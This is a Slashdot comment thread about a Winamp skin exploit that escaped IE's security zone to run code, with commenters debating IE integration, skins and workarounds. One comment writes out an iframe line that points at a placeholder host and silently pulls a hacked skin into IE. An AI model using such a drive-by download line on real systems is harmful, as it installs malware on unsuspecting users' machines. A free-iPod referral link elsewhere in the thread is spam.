Winamp Skin Exploit in the Wild 397
An anonymous reader writes "Secunia.com has announced an exploit (derived from xml escaping the Internet zone into IE's local zone) that exploits Winamp's habit of automatically installing skins. Currently all versions of Winamp are affected. Details on the Winamp forums - apparently an exploit is already in the wild, and spreading."
yet another way... (Score:5, Funny)
Luckily the masses of windows users are content to use windows media player which should slow the spread of this.
Re:yet another way... (Score:5, Insightful)
Seems like the same old crap to me...
You convince some sucker to download and load something that isn't what it says it is. We've reported aim exploits that hide themselves as screensavers recently. [tech-recipes.com]
It's a major security problem when a program blindly executes something. Period.
It's a major security problem when people download untrusted winamp skins on IRC.
What can you do?
Re:yet another way... (Score:5, Funny)
Is calculator safe? (Score:5, Funny)
Re:yet another way... (Score:3, Funny)
Re:yet another way... (Score:3, Funny)
Damn you Britney! (Score:5, Funny)
I think I speak for a lot of people when I say... (Score:4, Insightful)
Re:Damn you Britney! (Score:3, Funny)
I've got you under my skin
I've got you deep in the heart of me
So deep in my heart, that you're really a part of me
I've got you under my skin
Re:Damn you Britney! (Score:4, Funny)
Well duh.
Pretty Girl + Virus = trouble in just about any context.
Throw "wife" into the equation and the result may be expressed both in terms of $$ and an unreal number.
Mozilla (Score:5, Insightful)
Re:Mozilla (Score:5, Informative)
Re:Mozilla (Score:3, Informative)
The author of Maxthon has said that the engine-switch option is there so web designers can check their pages quickly without having to have a multitude of browsers on their machines. It's not intended to be a generalized replacement for the IE libs that Maxthon i
Re:Mozilla (Score:3, Insightful)
Using anything from Microsoft's API in this day and age of alternatives is lazy programing, imho.
Re:Mozilla (Score:5, Informative)
The link is dead now, but I'm guessing the exe file just looks to see if mIRC is running, and gets the path, and extracts+runs some mIRC scripts. Classic trojan technique. Really not terribly difficult to make.
^^^
taken from Winamp Forums.
So does it matter?
say it out loud... (Score:3, Insightful)
WINDOWS
WINDOWS
WINDOWS
I don't care how leet folks think they are, as long as people run windows stuff, develop for windows, run windows apps, think about windows, they are gonna get hosed, sooner or later.
You would think after 10 years of this stuff that it would be noticed, nope, folks still think just one more patch or one more version higher
Re:Mozilla (Score:5, Informative)
The bug isn't that the browser passes the file to the correct handler app, but that the app itself executes code it shouldn't.
Re:Mozilla (Score:3, Insightful)
The real problem is that DOS was never designed to be networked, and that carried over into Windows. NT's access control is based on VAX/VMS, which is rather OTT for most people's requirements, and so most people simply don't use it. Unix/Linux/OSX access control, while less sophisticated, is at least more likely to be used prop
Can I name the worm?? (Score:5, Funny)
Re:Assistance for the clueless (Score:5, Informative)
Flensing means to remove the skin [bartleby.com] from something.
Further evidence that skinning is stupid (Score:5, Funny)
Re:Further evidence that skinning is stupid (Score:2, Insightful)
Alas, people like shiny, blinky, glowy things aka bling.
I won' bother saying what I think of 'skinning' on account it would be moderated as a troll or less because most people like shiny, blinky, glowy things aka bling and I don't...
Am I the only one... (Score:5, Interesting)
Re:Am I the only one... (Score:5, Funny)
Simple solutions (Score:5, Informative)
OR
Don't use skins at all.
Re:Simple solutions (Score:3, Informative)
Re:Simple solutions (Score:5, Informative)
That would be fine advise if the victims knew they were downloading a Winamp skin. The link, however, looks like it is an image file:Going clicky-clicky (or otherwise following the link) exacuted a PHP script which would serve up a winamp skin. Since many users have their browsers automagically handle Windamp skins, it would immediately get handed off to Winamp to execute. The skin linked to several files that eventually called an executable within the skin package which in turn loaded one's mIRC client with a script that spat out the above message.
The victims probably didn't know what hit them.
Re:Simple solutions (Score:3, Informative)
Re:Simple solutions (Score:3, Interesting)
Re:Simple solutions (Score:3, Insightful)
Winamp parses the XML file which contains an embedded link to the
Why are markup languages allowed to link to executables? Allowing arbitrary hotlinks to an untrusted location without proper validation is a security hole the size of an aircraft carrier.
As long as... (Score:3, Funny)
All versions are affected? (Score:5, Informative)
Is 2.x actually susceptible or is the submitter incorrect?
Re:All versions are affected? (Score:5, Informative)
If you unchecked "Modern Skin Support" in the installer you are also NOT affected.
You can even remove Modern Skin Support just by renaming Program Files\Winamp\Plugins\gen_ff.dll to gen_ff.dll.old. This will remove the exploit.
If you fix this way, you will only be able to use classic skins.
Re:All versions are affected? (Score:5, Informative)
What many people don't realize is that Winamp 5 IS Winamp 2 (Check out this this article [winamp.com].). It's the same code, but with extra plug-ins bundled in. The user can choose which plug-ins or features he wants to include or not include when installing. So I'm not sure how you could call the application bloated when the app installs only what the user feels he or she needs.
All Versions? (Score:5, Informative)
Re:All Versions? (Score:2)
Re:All Versions? (Score:2)
Yeah, 3.x was a mess... but 5.x is based on the 2.x version with the modern skin support added in. On my (albeit fast) PC it routinely sits in the background playing MP3s consuming a bit over 5mb or RAM and using 0% CPU.
The Media Library is decent, like iTunes but without genre browsing, and far more customizable. And it isn't a complete piece of shite like iTunes for Windows is.
i hate skins (Score:2, Interesting)
Re:i hate skins (Score:2)
Apparently not. [slashdot.org]
Re:i hate skins (Score:3, Informative)
Re:i hate skins (Score:3, Interesting)
Ever changing interfaces would indeed be an annoyance, but the point of skins is to let you find the UI you like and stick with it. For any individual user the UI is the same (unless you really want to keep changing it) its just that different users can have different UIs.
Its a bit like the "bloat" in large applications like Word. Of course most users only use 10-20% of Word's features, but each person can use a subtly different 10-2
Re:i hate skins (Score:4, Interesting)
I don't go with random skins, or frequently changing skins. I just browse the library, pick a good one, and stick with it.
Re:i hate skins (Score:2)
Re:i hate skins (Score:3, Insightful)
Pick an interface they like? Hah. I wish I could pick the skin I like: None at all. Something that makes the application's interface look and work exactly like every other application I run instead of some incomprehsible and unusable artistic garbage.
Re:i hate skins (Score:3, Insightful)
Why does it have to be ever changing? Find the look you like and stick with it. If that happens to be the default, great.
Re:i hate skins (Score:2)
no transitions
etc etc
Redmond school of engineering (Score:5, Interesting)
Fixes... (Score:5, Informative)
Re:Fixes... (Score:5, Insightful)
Re:Fixes... (Score:3, Informative)
According to the Winamp forums, the default Firefox configuration is just as susceptible to this exploit as IE is. You can change your settings in either browser so that it is not affected by your exploit.
Fortunately, I use Mozilla. :)
Winamp Unlimited Has The Full Report (Score:5, Informative)
Winamp Unlimited [winampunlimited.com] has a friendly summary on how the worm infects the user, as well as steps one can take to avoid being infected.
This is also worth noting: "The Nullsoft team have already implemented a patch for this exploit, which will be included in a very-near future release5.04a or 5.05. This next version is already in its third beta stage, and will include several other unrelated changes/fixes."
Skinning is Worth It (Score:5, Funny)
I mean, WinAmp can actually look like different kinds of real CD players! Can you believe that? It can look like all sorts of things; it doesn't have to look like a rectangular window at all. That just rocks! You can even change the way it looks at runtime! You can download whole new looks! Man, that is too cool.
Kudos to those guys. This is the kind of thing that really makes computing fun.
Re:Skinning is Worth It (Score:2)
things to say (Score:3, Insightful)
(1) I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then it's disabling can also be circumvented?
(2) Absolutely right, having a component of the system that is active to ALL programs, wether it wants it or not, is inviting the most bizarre of security holes. Of course, the WinAmp people probably should come up with a better, more secure transport method for getting their skins around, but it's not really their fault that IE is a pile of crap security wise.
(3) what kinda genius would figure out that you could embed an xml file, with instructions to run a specific executeable file, within a zipped skin file, and then manage to trigger a security hole in a web-browser module that really shouldn't have a damn thing to do involved with the program that you're sending this virus through? The people who are BREAKING the security I figure have got to be infinitely more intelligent than the people who are CREATING the security.. or at least a whole hell of a lot more creative..
i really can't imagine that anyone could be thinking, when they write a program like this, "oh, what if someone tries to take advantage of such and such known security flaw in this way through our program, even though they don't have jack and shit to do with each other?"
obviously, you're going to try to cover in advance for security things, but who could predict in attack in such a convoluted fashion?
Re:things to say (Score:3, Insightful)
Re:things to say (Score:2, Insightful)
That's precisely what this is. It's like checking for secret doors in a dungeon in an old RPG like Bard's Tale. One step forward, check right, check left. One step forward, check right, check left. Repeat until you find an opening.
This sort of thing could very easily affect Linux as well. As much as I love Linux I've been waiting for someone to spring something like this through Mozilla. It's only a matter of time before someone figures it out.
Re:things to say (Score:4, Informative)
It is possible [slashdot.org] to easily fix this problem.
Skinny Dipping (Score:3, Insightful)
Re:Skinny Dipping (Score:4, Informative)
http://http//www.crackbaby.com/article.php?sid=10
Not tried it myself yet, but it replaces all calls to IE with calls to the browser of your choice.
Expect these to grow more common... (Score:5, Interesting)
Now that people have started to use firewalls, and the risk of worms and rootkits that infect through open, exploitable, holes grows smaller, it is time to expect more and more exploits to follow alternative vectors.
Note how many buffer-overflow exploits there have been in server daemons. Well, there is no reason to believe that servers are any worse written with regards to input than client applications - quite the contrary actually.
People think they are safe with a firewall. But I'm willing to bet there are undiscovered exploits in just about every application they run. WinZip? WinAMP? Acrobat Reader? Media player? Anything that handles files received over the Internet is potentially a vector for viruses and possibly worms.
This time it was bad escaping, which made the exploit trivial, but there a buffer overflow would have served just as well. Neither firewalls nor anti-virus software will protect you.
Summary of article summary (Score:2, Redundant)
Dumb Question (Score:5, Interesting)
For what possible purpose does a skin -- which is essentially nothing more than graphical elements -- need to invoke the browser?
WTF? Seriously, help me out here. I've only been a programmer for 25 years, so I may not understand the deeply compelling reasons driving such a design decision.
Schwab
Re:Dumb Question (Score:2, Informative)
Dumb Answer (Score:3, Interesting)
*raises hand*
Because since the late 90s EVERY PROGRAM must use the internet in some way. Useful or not. Anyone else notice this trend?
Re:Dumb Question (Score:5, Informative)
They did this not because it's a good idea for every application to have internet access and rich scripting with only a token sandbox about the potentially untrusted data they're displaying, but because they wanted to keep the DoJ from forcing them to compete with other companies that were producing web browsers.
My response at the time was to ban the use of IE, Outlook, and any other application that I could think of or that I found out about that was using this component to view untrusted documents. Well, I didn't ban them directly, I talked our CEO into it. I figured that most IT administrators and managers would do the same, because this was obviously just asking for trouble (I didn't know what trouble it would cause, but I knew it was asking for it). Then, when Melissa hit a little while later, I figured THAT would finally be enough to get people to ban these "typhoid mary" applications. I mean, anyone could tell this was doomed.
Boy, was I naive. I forgot that people who haven't worked on computer security aren't nearly paranoid enough. I expect that on the 10th anniversary of the integration of IE with the desktop people will still believe Microsoft when they say they're serious about security this time.
And I never would have imagined that Apple would follow suit and use the same LaunchServices for local applications opening things like help files and for web browsers to run plugins, helper apps, and so on...
For the love of god, people, get on the horn to Microsoft, and Apple, and the folks at Mozilla.org who are still using these inherently broken APIs themselves (yes, Firefox has been demonstrated to respond to a couple of the same exploits). Tell them that ENOUGH is ENOUGH. You can't fix this with better heuristics, you can only fix it by making the sandbox unconditional... seperate the display code and the access code and give each application a choice of bindings (at the VERY least, 'this is the binding for trusted documents, this is the binding for untrusted documents, and this is the binding for you specifically').
haven't used WinAmp in 5 years. (Score:2)
http://www.quinnware.com
revenge (Score:5, Funny)
More support for JWZ's audiocock technology. (Score:2)
back to media player.. (Score:3, Interesting)
"Cant trust those evil 3rd party hacker programs... Thats what they say they wouldnt lie.. See this just proves it.."
Not that Microsoft would be *that* evil to release exploits for 3rd party apps.... but its an idea..
Winamp's or IE's fault? (Score:4, Interesting)
This isn't the first app that gets nailed just because it was using IE (for whatever extent of use - full rendering or peripheral stuff like SSL Certificate handling or XML processing).
Just add this to the IE screwups tally
get a free iPod! [freeipods.com][This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier
i'm famous! (Score:3, Interesting)
Just to add to the original thread a little, I only saw the worm spreading on IRC and I only saw 2 people who were spamming the link - like all mirc worms the infected person doesn't know they are doing it until someone tells them.
I guess it's not got very far - since I reported the exploit i've not seen another spammed link for it.
The RIAA press release.... (Score:3, Funny)
Even more fun... (Score:4, Insightful)
Foo! (Score:5, Insightful)
It isn't just the skin... (Score:3, Informative)
iframe src="http://www.blah.com/winamphackedskin.wsz"
That right there, in any browser, will initiate a download of the winamp skin file. In Opera/Firefox/Mozilla you are given a download confirmation prompt. However, if IE is your default browser then IE will auto download and install the winamp skin without your knowledge.. or at least until your winamp pops up suddenly with a new skin. We can't tell people to "don't download skins" merely because it's far more serious than that. Manual skin changing or not, that iframe trick is going to nail a lot of people.
The best bet would be to ignore winamp completely until a patch can be provided, or have Firefox set as your default browser.
Suggestion to Windows yet NON-IE users (Score:3, Interesting)
When will software companies and developers learn? (Score:3, Insightful)
Re:Easy fix (Score:3, Insightful)
Re:Easy fix (Score:2)
but um... what about listening to internet radio stations? how about when you use it to sample music online? a lot of those online music sites (mp3.com for example) have a
Re:Easy fix (Score:3, Informative)
Re:Macs (Score:2)
Re:Macs (Score:2)
How to fix IE, Safari, and everything else... (Score:5, Insightful)
If you use the *same* application, API, or application binding (eg, the file type bindings used by the desktop and the MS HTML control, or Apple's LaunchServices) for both sandboxed and trusted objects, then you open up the possibility that an untrusted object will look like a trusted object, or that an untrusted object will be passed to a handler that isn't inherently safe.
Apple blew this with launchServices, and they still haven't really fixed the underlying problem. But they've only been in denial a few months, whereas Microsoft has been in denial about this for seven years, so let's look at Microsoft...
Let's suppose the HTML control was split up, so it only did rendering. Whenever it wanted to open a file, open a URL, run a script, load a plug-in, it would ask the parent application "what do I do about a CHM file" or "what do I do about <script language=vbscript>". You'd have an "HTML-only control" and a "Web Access control" and IE would be a very slightly thicker wrapper around both.
So then you register "Word Viewer"[1] with Outlook and IE as the helper application for Word documents, and "Word" with Windows Explorer as the helper application for trusted Word documents. If this was done, then Outlook (which would be a sandboxing application in this model) would open "Word Viewer" for untrusted documents.
Viola, no more email-spread Word macro viruses.
Similarly, Outlook would decline to run VBscript, and IE would decline to run the Windows Update plugin... you'd have a Windows Update program that was a thin shell around the HTML-only control... one that only opened windows update.
Microsoft could have their cake and eat it too, and EVERYONE would have a more secure and less spammy environment.
Uh... footnote I forgot... (Score:2)
Re:Macs (Score:3, Insightful)
I realize you're trolling, but I'm bored...
Yes, Apple DOES decide for you that you need a web browser in every application on the operating system. Is it insecure? Well, not that we know of right now, because Apple patches the holes when they're found, just like Microsoft does (but yes, Apple's browser does have fewer security holes than Microsoft'
Re:Macs (Score:2)
Re:Macs (Score:2)
Re:Just another reason (Score:2, Insightful)
Re:Just another reason (Score:2)
I always changed this to show the album like you mentioned.
Re:Just another reason (Score:2, Insightful)
Re:Just another reason (Score:2)
Of course unchecking "modern skin support" in Winamp would remove the security risk as well.
Re:Just another reason (Score:2)
XMMS+Crossfade is great for things like LOTR soundtrack or just regular albums where songs go over tracks - no horrible pauses.
I just wish it had decent album management. imo Musicmatch Jukebox has the best library management system.
Re:Just another reason to use iTunes, I guess (Score:3, Funny)
Re:Just another reason to use iTunes, I guess (Score:3, Informative)
Seriously man... posting this comment in a thread detailing an exploit in your elitist program is kinda... retarded.
WinAmp exploits: 2 (that I know of [securiteam.com])
iTunes exploits: 0
Let's keep score.
Re:Just another reason to use iTunes, I guess (Score:2, Insightful)
Memory is cheap, but that doesn't mean I want Apple deciding it can just
Re:School must've just gotten out. (Score:5, Funny)
vocabularical [reference.com].
I believe you were saying something?
Re:winamp skin (Score:2, Insightful)
It really annoying that IE integration can't be disabled or if it's even possible to integrate with another browser.
I don't know exactly how it works, but certain streams will pop open the Winamp browser window to the stream's home page and the stream's home page has popups.
In fact, due to integration with IE, even if you don't use IE for an
Re:Winamp 2.xx..... (Score:5, Informative)
5.x playing in the background using 0% CPU and under 6mb of RAM... about what 2.x uses... with a feature-set comparable to iTunes without the huge iTunes resource overhead, 3 installed services, etc, etc. A "lightweight" media player like foobar2000 is ~1% CPU and 11mb RAM.
Re:Super-simple MP3 Player (Score:3, Informative)
Of course, they had to put in "themes", but at least it doesn't download them itself.
Re:Super-simple MP3 Player (Score:4, Informative)
http://www.foobar2000.org/ [foobar2000.org]
Handy, simple, small, and will go straight to the system tray.